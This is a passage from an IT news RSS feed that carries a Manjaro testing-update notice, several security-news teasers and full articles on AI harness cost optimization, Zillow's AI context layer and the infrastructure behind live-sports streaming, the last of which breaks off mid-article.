Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">(click for more details)</a>
<h2><a name="p-867346-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-867346-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li>Kernels</li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/26.1.4.html">26.1.4</a> / <a href="https://docs.mesa3d.org/relnotes/26.1.5.html">26.1.5</a></li>
<li><strong>VirtualBox</strong> <a href="https://www.virtualbox.org/wiki/Changelog-7.2">7.2.14</a></li>
<li><strong>Gambas3</strong> <a href="https://gambaswiki.org/wiki/doc/release/3.22.0">3.22.0</a></li>
<li><strong>Qemu</strong> <a href="https://wiki.qemu.org/ChangeLog/11.0">11.0.2</a></li>
</ul>
<h2><a name="p-867346-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-867346-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.177</li>
<li>linux66 6.6.144</li>
<li>linux612 6.12.96</li>
<li>linux618 6.18.39</li>
<li>linux71 7.1.4</li>
<li>linux72 7.2.0-rc4</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.135_rt74</li>
<li>linux612-rt 6.12.89_rt18</li>
</ul>
<p><strong>Package Changes</strong> (7/22/26 05:45 CEST)</p>
<ul>
<li>testing core x86_64:  17 new and 17 removed package(s)</li>
<li>testing extra x86_64:  762 new and 759 removed package(s)</li>
<li>testing multilib x86_64:  19 new and 19 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://gist.githubusercontent.com/hphilm/0048b57b3edd04810dd2b79c947f2ab6/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>1 post - 1 participant</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-07-22-kernels-mesa-virtualbox-gambas3-qemu/189122">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco’s open-weight bug busters take on Google and OpenAI]]></title>
<description><![CDATA[Don’t call them chatbots This article has been indexed from www.theregister.com – Articles Read the original article: Cisco’s open-weight bug busters take on Google and OpenAI
Read more →
The post Cisco’s open-weight bug busters take on Google and OpenAI appeared first on IT Security News.]]></description>
<link>https://tsecurity.de/de/3684907/it-security-nachrichten/ciscos-open-weight-bug-busters-take-on-google-and-openai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684907/it-security-nachrichten/ciscos-open-weight-bug-busters-take-on-google-and-openai/</guid>
<pubDate>Tue, 21 Jul 2026 23:54:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Don’t call them chatbots This article has been indexed from www.theregister.com – Articles Read the original article: Cisco’s open-weight bug busters take on Google and OpenAI</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ciscos-open-weight-bug-busters-take-on-google-and-openai/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ciscos-open-weight-bug-busters-take-on-google-and-openai/">Cisco’s open-weight bug busters take on Google and OpenAI</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat 2026: Key news, takeaways and security trends]]></title>
<description><![CDATA[This is your guide to the breaking news, trending topics and more at Black Hat USA 2026, from Dark Reading, Cybersecurity Dive and TechTarget Cybersecurity.]]></description>
<link>https://tsecurity.de/de/3684754/it-security-nachrichten/black-hat-2026-key-news-takeaways-and-security-trends/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684754/it-security-nachrichten/black-hat-2026-key-news-takeaways-and-security-trends/</guid>
<pubDate>Tue, 21 Jul 2026 22:52:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is your guide to the breaking news, trending topics and more at Black Hat USA 2026, from Dark Reading, Cybersecurity Dive and TechTarget Cybersecurity.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco’s open-weight Antares models make vulnerability localization cheaper]]></title>
<description><![CDATA[A security analyst opens an unfamiliar repository, pulls up a vulnerability advisory, and starts hunting for the file where the weakness lives. The naming conventions belong to someone else. Evidence sits in scattered corners of a codebase that runs to…
Read more →
The post Cisco’s open-weight An...]]></description>
<link>https://tsecurity.de/de/3683883/it-security-nachrichten/ciscos-open-weight-antares-models-make-vulnerability-localization-cheaper/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683883/it-security-nachrichten/ciscos-open-weight-antares-models-make-vulnerability-localization-cheaper/</guid>
<pubDate>Tue, 21 Jul 2026 15:39:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A security analyst opens an unfamiliar repository, pulls up a vulnerability advisory, and starts hunting for the file where the weakness lives. The naming conventions belong to someone else. Evidence sits in scattered corners of a codebase that runs to…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ciscos-open-weight-antares-models-make-vulnerability-localization-cheaper/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ciscos-open-weight-antares-models-make-vulnerability-localization-cheaper/">Cisco’s open-weight Antares models make vulnerability localization cheaper</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[heise-Angebot: Digitale Souveränität in der Praxis: Strategien, Fallstudien, Know-how]]></title>
<description><![CDATA[Der IT Summit 2026 zeigt IT-Verantwortlichen konkrete Wege, wie sie ihr Unternehmen bei KI, Arbeitsplatz und Infrastruktur digital souveräner aufstellen können.]]></description>
<link>https://tsecurity.de/de/3682817/it-nachrichten/heise-angebot-digitale-souveraenitaet-in-der-praxis-strategien-fallstudien-know-how/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682817/it-nachrichten/heise-angebot-digitale-souveraenitaet-in-der-praxis-strategien-fallstudien-know-how/</guid>
<pubDate>Tue, 21 Jul 2026 08:18:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der IT Summit 2026 zeigt IT-Verantwortlichen konkrete Wege, wie sie ihr Unternehmen bei KI, Arbeitsplatz und Infrastruktur digital souveräner aufstellen können.]]></content:encoded>
</item>
<item>
<title><![CDATA[Writer's AI harness cuts token spend nearly 40% — without sacrificing accuracy]]></title>
<description><![CDATA[Enterprise AI is facing an ROI paradox. While throwing more compute at the strongest foundation model works well in product experiments, the costs become unbearable when the product is deployed in production.A new paper from researchers at Writer provides a solution that is accessible to engineer...]]></description>
<link>https://tsecurity.de/de/3682237/it-nachrichten/writers-ai-harness-cuts-token-spend-nearly-40-without-sacrificing-accuracy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682237/it-nachrichten/writers-ai-harness-cuts-token-spend-nearly-40-without-sacrificing-accuracy/</guid>
<pubDate>Mon, 20 Jul 2026 23:48:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise AI is facing an ROI paradox. While throwing more compute at the strongest foundation model works well in product experiments, the costs become unbearable when the product is deployed in production.</p><p>A <a href="https://arxiv.org/abs/2607.06906">new paper</a> from researchers at Writer provides a solution that is accessible to engineering teams. The study takes a systematic look at optimizing the different components of the orchestration layer that wraps around the foundation model, aka the AI harness. </p><p>By optimizing the harness, the researchers show dramatic reductions in tokens per task, a drop in cost-per-successful-task by up to 61%, and quality that holds steady, all without changing the underlying foundation model.</p><p>Because the harness is fully under the developer's control and requires no model fine-tuning, engineering teams can apply these findings to build highly cost-efficient AI applications.</p><h2>The ROI crisis of tokenmaxxing</h2><p>The current state of AI engineering is plagued by "<a href="https://blog.pragmaticengineer.com/the-pulse-tokenmaxxing-as-a-weird-new-trend/">tokenmaxxing</a>," an industry trend where developers rely on massive context windows and brute-force token consumption as a substitute for good system design. </p><p>Rather than engineering elegant workflows, developers have imported a reflex from traditional software development: generate, run, fail, stuff the error and more context back into the window, and retry. </p><p>"Teams tokenmaxx because it's the cheapest fix in the moment, and because it's literally how most engineers work today," Waseem AlShikh, CTO and co-founder of Writer, told VentureBeat. Because this approach succeeds often enough on coding tasks, it has become the default reflex for every other agentic workload. The danger is that per-token price drops mask the underlying inefficiency. </p><p>"Your invoice is tokens-per-task times price-per-token, and most teams only watch the second number," AlShikh said. "In agentic workloads, tokens-per-task compounds — every loop iteration re-transmits the growing context — and it compounds faster than prices fall. The price cut becomes an anesthetic. It masks the fact that the loop itself is bleeding."</p><p>Tokenmaxxing leads to several enterprise failure modes. Teams route simple tasks to premium frontier models by default. They use the LLM as a lazy search index, stuffing the context window with raw documents instead of retrieving exact answers. Most destructively, they build unconstrained agentic loops that spiral out of control when the model encounters an error. Because output tokens cost significantly more than input tokens across all major model providers, inefficient task execution acts as a silent budget killer.</p><p>The industry has introduced several efficiency techniques to curb these costs, but they largely fall short because they treat the model in isolation: </p><ul><li><p><b></b><a href="https://venturebeat.com/data/context-compression-finally-works-in-production-new-research-cuts-llm-input-16x-without-the-accuracy-hit"><b>Prompt compression</b></a> condenses input text to save space, but ignores how the system sequences those inputs across complex workflows. </p></li><li><p><b>Budgeted reasoning</b> caps the computational steps a model can take, which often degrades output quality if the workflow isn't intelligently routed. </p></li><li><p><b>Terse coding</b> forces models to output minimal code to save output tokens, but does nothing to solve inefficient tool calling. </p></li><li><p><a href="https://venturebeat.com/data/together-ais-atlas-adaptive-speculator-delivers-400-inference-speedup-by"><b>Speculative decoding</b></a> uses a smaller draft model to speed up a larger model's text generation, optimizing inference speed while failing to address bloated agent architectures.</p></li></ul><p>These efforts fail because they optimize the engine while ignoring the transmission. They do not look at the orchestration layer, leaving underlying architectural inefficiencies unresolved.</p><h2>Unpacking the harness: the levers of efficiency</h2><p>The harness is the orchestration layer that routes, formats, and turns the underlying LLM into a working system.</p><p>The core levers of harness optimization include system prompt caching, interaction history compaction, tool management, retrieval strategies, and error management. These are the most accessible intervention points for engineering teams looking to improve AI performance. </p><p>As the Writer researchers note in the study: “If the harness is the layer that composes model calls into work, it is also the layer that sets the price of work.”</p><p>Historically, developers have treated the harness as disposable glue code designed simply to connect an API to a user interface. The study signals that the harness must now be treated as a first-class object: a primary software artifact that requires its own testing, versioning, and rigorous design. </p><p>For enterprises, this reframes the "own-versus-rent" decision. </p><p>"Enterprises spend months on model evaluations and then rent their orchestration off the shelf — which means they're optimizing the smaller lever and outsourcing the bigger one," AlShikh said. "Whoever owns the harness owns your unit economics, and an open framework tuned for demos is not tuned for your invoice." </p><h2>Inside the experiments</h2><p>To isolate the impact of the orchestration layer, the researchers ran experiments on six foundation models spanning multiple vendors and weight classes: Claude Sonnet 4.6, Gemini 3.1, Gemini Flash 3.5, Qwen 3.6, GLM 5.1, and Writer’s own model, Palmyra X6. </p><p>Their experiments compared a frozen, conventional production agent loop against the finished Writer Agent Harness on the same 22 locked enterprise tasks, spanning capabilities like grounding and retrieval, multi-step workflows, tool use, and content generation. By holding the models and tasks constant, they could isolate the effects of the orchestration layer itself.</p><p>The optimized harness drove a significant drop in costs, cutting the blended cost per task by 41%, from 21 cents to 12 cents. This was largely achieved by slashing token consumption, with the number of tokens per task falling 38%, from 14.2k to 8.8k.</p><p>The harness is designed to delegate tasks like search to specialized sub-agents. A sub-agent receives only the tool and the specific query it needs, retrieves the exact data, and returns a capped, clean summary to the main agent — keeping the primary context window from filling up with raw search results.</p><p>Task success rates held steady even as token use fell — moving from 78% to 81%, a gain the researchers describe as directional rather than statistically significant at their sample size, meaning quality didn't suffer even as costs dropped.</p><p>End-to-end task latency also dropped significantly, reducing the median wall-clock time by 44%, from 48 seconds to 27 seconds, due to prompt caching and the elimination of dead-end reasoning loops.</p><p>However, the researchers also found limits to multi-agent orchestration. Smaller models like Gemini Flash 3.5 and Qwen 3.6 scored well below a usable reliability threshold on sub-agent delegation tasks (0.45 and 0.42, respectively) — the capability simply isn't dependable yet on lighter-weight models.</p><p>Sub-agent orchestration only crossed a usable reliability threshold on the two strongest models tested: Writer's own Palmyra X6 (0.86) and Claude Sonnet 4.6 (0.85).</p><h2>The developer’s playbook: actionable takeaways and tradeoffs</h2><p>The findings from the study translate into a playbook for enterprise developers building agentic workflows at scale. The first step is to implement what AlShikh calls the "Two-Zone Prompt" and "Context Offloading."</p><p><b>Structure for system prompt caching (The Two-Zone Prompt):</b> Modern LLM APIs offer prompt caching, but developers must structure their payloads correctly to trigger it. Developers must separate the "stable zone" from the "volatile zone." Place static, unchanging elements (e.g., core rules, large tool schemas, and standard operating procedures) at the top of the prompt. Dynamic elements, such as the specific user query or recent conversational task state, must be appended at the bottom. This ordering allows the harness to reuse the cached prefix across hundreds of calls. "That single separation makes prompt caching actually work and stops you from re-paying for the same instructions on every one of an agent's thirty steps," AlShikh said.</p><p><b>Manage context with Context Offloading:</b> Avoid context stuffing, where every turn of a loop is appended into a monolithic prompt until the window maxes out. Instead, move history and intermediate artifacts out of the window into retrievable storage, and pull back only what the current step needs. If possible, delegate tasks to single-purpose sub-agents to avoid context bloat. As AlShikh points out, "the biggest line item in agent spend isn't reasoning — it's re-sending things the model has already seen."</p><p><b>Build resilient loops and redefine KPIs:</b> Unmanaged agent loops drain API budgets rapidly. Teams must begin tracking Completions Per Million tokens (CPM) to understand their true task costs, but the harness itself must contain physical guardrails. "The core principle is that you never ask the model to police its own spending," AlShikh said. "The fence has to live below the model, in code, on your side of the API." This requires three hard checks:</p><ul><li><p><b>Hard per-task token budgets:</b> The run terminates when the budget is spent, no exceptions.</p></li><li><p><b>Generation fencing:</b> Caps on steps, tool calls, and recursion depth to stop non-converging agents. </p></li><li><p><b>Failure-spend governance:</b> Cap what a run can spend after its first failed validation so a failing task doesn't become your most expensive task.</p></li></ul><p><b>Avoid unnecessary complexity:</b> Optimizing the orchestration layer comes with engineering overhead. If you're in the prototyping and exploration stage, that overhead isn't justified — iterate fast with a strong model and a light harness. Once you're scaling to millions of requests a day, the savings from harness optimization become substantial.</p><p>However, teams must be aware of "harness leverage." Adding structural scaffolding requires the model to hold and obey that context. If a model is too small, it will spend its limited capacity parsing the scaffolding instead of doing the task, causing accuracy to drop and tokens to rise. The rule for adding complex orchestration features is strictly mathematical: "If a feature adds more coordination tokens than it removes task tokens for that specific model, cut it," AlShikh said. "Nothing in the harness is free."</p><h2>The future of the enterprise harness</h2><p>The era of tokenmaxxing and treating context windows like bottomless buckets is coming to an end. Throwing more compute at poorly designed systems is not a viable strategy for companies that need to demonstrate a return on their AI investments. </p><p>As foundation models evolve to absorb planning, tool selection, and multi-step reasoning natively into their weights, the role of the harness will shift from compensating for model weakness to enforcing enterprise policy.</p><p>"What never moves into the model is the 'allowed': budgets, permissions, data boundaries, audit trails, deterministic kill-switches," AlShikh said. "Five years from now, the harness will be thinner but more important. There will be less scaffolding and more governance. However capable the model gets, someone external to it still has to define what it may spend, see, and touch. That layer belongs to the enterprise, and it should never be rented."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[At VB Transform 2026, Zillow's engineering chief said AI ROI numbers only hold up if you measure before you build]]></title>
<description><![CDATA[Zillow, the real estate technology company, doesn't get one conversation with its customers. They move from a phone screen to a loan officer to a real estate agent, sometimes over months or years, and expect the context to follow them. A single chatbot could never carry that thread.At VB Transfor...]]></description>
<link>https://tsecurity.de/de/3681824/it-nachrichten/at-vb-transform-2026-zillows-engineering-chief-said-ai-roi-numbers-only-hold-up-if-you-measure-before-you-build/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681824/it-nachrichten/at-vb-transform-2026-zillows-engineering-chief-said-ai-roi-numbers-only-hold-up-if-you-measure-before-you-build/</guid>
<pubDate>Mon, 20 Jul 2026 19:18:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Zillow, the real estate technology company, doesn't get one conversation with its customers. They move from a phone screen to a loan officer to a real estate agent, sometimes over months or years, and expect the context to follow them. A single chatbot could never carry that thread.</p><p>At<a href="https://venturebeat.com/vbtransform2026"> VB Transform 2026</a>, Zillow SVP of Engineering Toby Roberts and Glean co-founder and CEO Arvind Jain described how they built AI architecture meant to carry context across that entire journey — and why context, not raw data, turned out to be the harder problem to solve. Zillow's products touch roughly 80% of U.S. real estate transactions each year, and the company has been using AI long before ChatGPT existed.</p><p>"We pretty quickly identified that we were going to need a persistent context layer that was going to meet our customers and the professionals wherever they were," Roberts said.</p><h2>Data was never the hard part</h2><p>Roberts said Zillow's AI effort started where most enterprise AI efforts start, with the data itself.</p><p>"We started with a large push around making sure our data did have the right foundation," Roberts said. That meant a data mesh approach, clear data lineage and a governance structure with permissions and identity attached to the data itself.</p><p>None of that turned out to be the hard problem. The hard problem was building something that remembered where a customer was in their journey and carried that forward, no matter which surface they showed up on next.</p><p>"This context layer has to live to be able to support you where you are at any given point in your journey," Roberts said. Zillow chose to own that layer itself rather than depend on a single external chat interface, a decision Roberts said the team reached quickly once it looked at the shape of a real transaction rather than a single conversation.</p><h2>Why Zillow built its own architecture, and where Glean fits into it</h2><p>Zillow built its own harness rather than route customers through a single model API. The team drew on 20 years of machine learning history behind products like Zestimate, leaning into smaller, task-specific fine-tuned models instead of one general-purpose model.</p><p>Internally, that harness runs alongside Glean. Roberts said Zillow now has thousands of Glean agents in production, handling repetitive tasks with tens of thousands of executions across the company. Glean's pitch, per Jain, is centralizing that integration work once, through the Glean MCP gateway, rather than letting finance, legal and marketing each rebuild their own connections to the same systems.</p><p>That centralization is also a cost lever. Jain pointed to two mechanisms: model routing, which sends most tasks to smaller, cheaper models instead of defaulting to frontier models, and precomputed context, which avoids an agent burning tokens assembling its own context from scratch.</p><p>"Claude is also very slow because the first part of assembling that context actually takes forever," Jain said. Routing that request through Glean instead, he said, can cut token consumption by as much as half.</p><h2>What Zillow and Glean's approach means for enterprises</h2><p>Across data, cost and permissions, the session offered a few practical takeaways for enterprises building agentic AI on their own systems.</p><p><b>Build the measurement baseline before the AI push, not after. </b>Roberts said Zillow's ability to credibly attribute a 40% increase in shipped code to AI adoption rests on a DORA metrics baseline the team put in place years earlier, not on the AI rollout itself.</p><p><b>Centralize context once instead of letting every team rebuild it.</b> Jain's core argument for Glean's platform is that duplicated integration work across finance, legal and marketing teams is a hidden cost most enterprises haven't accounted for.</p><p><b>Don't assume permission inheritance is enough for regulated data.</b> Even with a permissions-aware context platform in place, Zillow layered hard rules and a standing compliance check on top for its most sensitive categories, rather than trusting the architecture to handle it automatically.</p><p><b>Treat context as a cost lever, not just a capability.</b> Model routing and precomputed context were the two mechanisms Jain pointed to for cutting AI spend, both aimed at reducing wasted token consumption rather than adding new capability.</p><p>"Models by themselves are not enough to bring automation with AI inside your enterprise," Jain said. "You do have to connect it with your enterprise context."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The technology behind every live sports moment]]></title>
<description><![CDATA[When a goal goes in during a tournament quarter-final and a hundred million people watch it at the same time, what they feel is the goal. The roar, the replay, the disbelief.



They do not feel the contribution feeds traversing private media networks across continents, or the edge nodes absorbin...]]></description>
<link>https://tsecurity.de/de/3681409/it-nachrichten/the-technology-behind-every-live-sports-moment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681409/it-nachrichten/the-technology-behind-every-live-sports-moment/</guid>
<pubDate>Mon, 20 Jul 2026 16:48:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When a goal goes in during a tournament quarter-final and a hundred million people watch it at the same time, what they feel is the goal. The roar, the replay, the disbelief.</p>



<p class="wp-block-paragraph">They do not feel the contribution feeds traversing private media networks across continents, or the edge nodes absorbing a traffic spike that appeared without warning.</p>



<p class="wp-block-paragraph">They just feel the moment.</p>



<p class="wp-block-paragraph">And that’s exactly how it’s supposed to work.</p>



<p class="wp-block-paragraph">And as live sports viewership pushes into territory that makes previous records look modest (driven by a generation that expects to watch anything, on any device, anywhere, without waiting), the gap between getting that delivery right and getting it wrong has never been more consequential, or more public.</p>



<p class="wp-block-paragraph"><strong>As audiences moved to digital platforms, the margin for error disappeared.</strong><strong></strong></p>



<p class="wp-block-paragraph">There is a version of this conversation that is easy to have: audiences expect more, technology has to keep up. True, but incomplete.</p>



<p class="wp-block-paragraph">Audiences have always expected live sport to work. What changed is what “working” means, and how quickly they find out when it doesn’t.</p>



<p class="wp-block-paragraph">Viewers no longer sit in front of a single screen. During a FIFA World Cup match, a household might have the main feed on the living room television, while someone else streams the highlights on a second TV in the bedroom, all while phones flash with live stats and tablets run separate commentary. From the infrastructure’s perspective, that isn’t just one household watching a game; it’s a chaotic web of concurrent demands triggered by the exact same split-second on the pitch.</p>



<p class="wp-block-paragraph">Multiply that across tens of millions of viewers, and the scale of the challenge becomes clear. Social media raises the stakes further. When a platform fails during a World Cup knockout match, audiences report it in real-time on the same platforms they use to discuss the game. The complaint travels faster than the fix.</p>



<p class="wp-block-paragraph">Broadcasters no longer have the luxury of resolving an incident before people notice. The incident becomes the story, and in many cases, travels further than the match itself.</p>



<h3 class="wp-block-heading"><strong>What these viewership numbers actually mean for infrastructure</strong></h3>



<p class="wp-block-paragraph">The shift in how people watch live sport has moved well beyond trend territory.</p>



<p class="wp-block-paragraph">EMARKETER forecasts that digital live sports audiences in the US will grow to <a href="https://www.emarketer.com/content/100-million-watch-live-sports-digital">114.1 million viewers</a>, while traditional pay TV audiences decline to 82.0 million, highlighting the continued shift toward streaming.</p>



<p class="wp-block-paragraph">The concurrency numbers generated by major sporting events now sit in a territory that would have seemed implausible a decade ago.</p>



<p class="wp-block-paragraph">During the 2026 FIFA World Cup, for instance, streaming platforms shattered every historical ceiling, highlighted by Brazil’s <a href="https://streamscharts.com/news/fifa-world-cup-2026-group-stage-livestreaming">CazéTV</a> repeatedly breaking global YouTube records for concurrent viewership during the group stage. Meanwhile, in the United States, Peacock and <a href="https://www.nbcuniversal.com/article/fifa-world-cup-2026-propels-telemundo-and-peacock-record-viewership">Telemundo’s</a> digital platforms logged an unprecedented 13 million concurrent viewers for a single knockout window. </p>



<p class="wp-block-paragraph">When tens of millions of people tune into the same live stream at the same moment, it’s a challenge unlike regular web traffic.</p>



<p class="wp-block-paragraph">Historically, massive global audiences were insulated by geography. The load was spread across distinct regional networks: antenna signals, satellite downlinks, and physical cable architectures. The physical infrastructure of traditional television inherently absorbed the impact. </p>



<p class="wp-block-paragraph">Digital streaming removes that buffer. Traffic spikes all at once, often at the most critical moment. The tighter the match, the deeper the stoppage time, the sharper the spike. Network infrastructure is forced to handle its heaviest, most volatile traffic exactly when it has zero margin for error.</p>



<p class="wp-block-paragraph">Social media compounds the pressure operationally. The second a crucial goal is scored, a wave of real-time reactions floods the internet, instantly dragging a secondary “curiosity audience” into the app. These are people who weren’t even watching the match, but saw the hype and decided to tune in, meaning the network has to absorb a massive new rush of users precisely while the primary stream is already maxing out its capacity.</p>



<p class="wp-block-paragraph">To survive these surges while satisfying a modern audience, the underlying broadcast playbook has undergone a massive structural shift. It’s no longer just about handling traffic; it’s also about using modern technology like AI to manage it intelligently.</p>



<p class="wp-block-paragraph">According to an <a href="https://www.haivision.com/blog/all/2025-broadcast-transformation-report-key-takeaways/">industry survey</a>, 25% of broadcasters integrated AI into live production workflows in 2025, a massive leap from just 9% the previous year, with 64% identifying AI as the single largest impact driver over the next five years. </p>



<p class="wp-block-paragraph">The network is no longer just delivering content. AI is now generating highlights and short clips in real time, producing millions of videos that keep fans engaged long after the live moment has passed.</p>



<p class="wp-block-paragraph">Ultimately, the technical demand is driven by a shift in what viewers expect. An <a href="https://newsroom.ibm.com/2025-08-18-ibm-study-sports-fans-demand-more-dynamic-digital-content,-powered-by-ai">IBM sports study</a> revealed that 56% of fans now want AI-driven insights layered directly onto their content, while 33% point to real-time, automated translation as the feature that most impacts their experience.</p>



<p class="wp-block-paragraph">Whether it’s one screen or several, viewers don’t notice the edge infrastructure or AI powering the experience. They just expect the game to play without interruption.</p>



<h3 class="wp-block-heading"><strong>The planning mistake most organisations make</strong></h3>



<p class="wp-block-paragraph">Capacity planning is where most organisations spend their time when preparing to stream a major event. Can the system handle a million concurrent streams? Can it scale on demand if the numbers exceed projections? These are real questions. </p>



<p class="wp-block-paragraph">The lesson is not unique to sports streaming. Every digital business now experiences moments where demand, visibility, and customer expectations collide. Peak traffic events such as flash sales, ticket releases, and viral campaigns can drive website traffic <a href="https://aws.amazon.com/blogs/apn/how-to-manage-peak-traffic-on-aws-using-queue-its-virtual-waiting-room/">2 to 25 times above normal levels within seconds</a>. The infrastructure may be different, but the pressure is remarkably similar.<br></p>



<p class="wp-block-paragraph">Large-scale system failures occur when multiple components, each functioning as expected on its own, are overwhelmed by a surge in demand, rising latency, or regional blind spots at the same time.</p>



<p class="wp-block-paragraph">The problem isn’t the individual systems. It’s how they work together.</p>



<p class="wp-block-paragraph">Latency is the factor most consistently underestimated. A few seconds of delay is not a minor inconvenience in live sport. It is a fundamentally broken experience. </p>



<p class="wp-block-paragraph">A viewer whose stream is running four seconds behind will see a notification before the decisive moment appears on screen. Someone watching a service from the privacy of their room may hear a celebration from another room before seeing it on their screen.</p>



<p class="wp-block-paragraph">Geography is another planning gap. Streaming growth is increasingly being driven by emerging markets. In Southeast Asia alone, premium video streaming subscriptions grew <a href="https://avia.org/southeast-asia-premium-vod-accelerates-in-2025-as-subscriber-growth-rebounds-ctv-scales-and-local-content-breaks-through/?utm_source=chatgpt.com">19%</a> in 2025, led by Indonesia, while viewing hours continued to climb across the region. Yet much of the world’s media infrastructure was originally designed around North American and Western European demand. An architecture that looks robust on paper can deliver very different experiences depending on where the viewer is.</p>



<p class="wp-block-paragraph">The reason is simple: physical distance still matters. Every extra hop between the viewer and the content adds latency, making it harder to deliver a consistent experience at global scale.</p>



<p class="wp-block-paragraph">Then there is the timing question. The decisions that determine whether a platform holds during the most-watched minutes of the year are not made on event day. They are made months earlier through choices around architecture, redundancy, testing, and operational readiness.</p>



<p class="wp-block-paragraph">Once an event is underway, it’s too late to redesign the architecture behind it. If your system isn’t designed to handle the pressure before the crowd arrives, it’s already too late.</p>



<h3 class="wp-block-heading"><strong>The hidden chain behind every live event</strong></h3>



<p class="wp-block-paragraph">When a streaming disruption becomes public, people naturally look for a single point of failure: the app, the platform, or the provider.</p>



<p class="wp-block-paragraph">A live event depends on dozens of systems working together, and any one of them can become a problem.</p>



<p class="wp-block-paragraph">And the experience is only as good as the weakest handoff between them.</p>



<p class="wp-block-paragraph">It all starts with the live camera feed moving from the venue to the production studio. This is a real-time stream, not a file download. If you drop even a single packet at the wrong moment, everything down the line breaks, no matter how perfect the rest of your setup is.</p>



<p class="wp-block-paragraph">Remote and cloud-based production workflows have redefined how live sports are produced, enabling broadcasters to operate with greater agility and scale. As production becomes more distributed, success increasingly depends on ensuring every stage of the delivery chain works together seamlessly.</p>



<p class="wp-block-paragraph">Each transition is a potential failure point. Managing them requires visibility that extends across providers, platforms, and networks simultaneously.</p>



<p class="wp-block-paragraph">Behind every live stream, technologies like encoding, transcoding, packaging, rights management, and ad insertion are constantly at work. If any one of them fails, the stream can go down altogether.</p>



<p class="wp-block-paragraph">Global distribution introduces another layer of complexity. Viewers in Asia, Africa, and South America may all be watching the same match, but each stream travels across different networks and infrastructure. That means performance can vary by region, and issues may affect one audience without impacting another. </p>



<p class="wp-block-paragraph">AI is increasingly helping operators detect anomalies in real time, pinpoint affected regions and trigger corrective actions before disruptions become widespread. Combined with point-to-point monitoring, it provides the visibility needed to keep live events running smoothly at global scale.</p>



<p class="wp-block-paragraph">Edge delivery is where the difference between preparation and improvisation becomes most apparent. Bringing content closer to users reduces latency, absorbs local traffic surges, and improves performance in markets with variable connectivity. </p>



<p class="wp-block-paragraph">The value of technology investments such as AI and Edge becomes clearest during the moments when demand is highest.</p>



<p class="wp-block-paragraph">Monitoring is what turns visibility into action. With AI helping analyze telemetry and detect anomalies in real time, operations teams can identify issues sooner and respond before they affect viewers. By the time customers start reporting a problem, the opportunity to prevent it has already passed.</p>



<h3 class="wp-block-heading"><strong>What reliability is actually worth</strong></h3>



<p class="wp-block-paragraph">For most of early broadcast history, audience tolerance provided some buffer. Disruptions happened. People accepted them. There was nowhere else to go, and the story rarely escaped the room.</p>



<p class="wp-block-paragraph">Neither of those things is true now.</p>



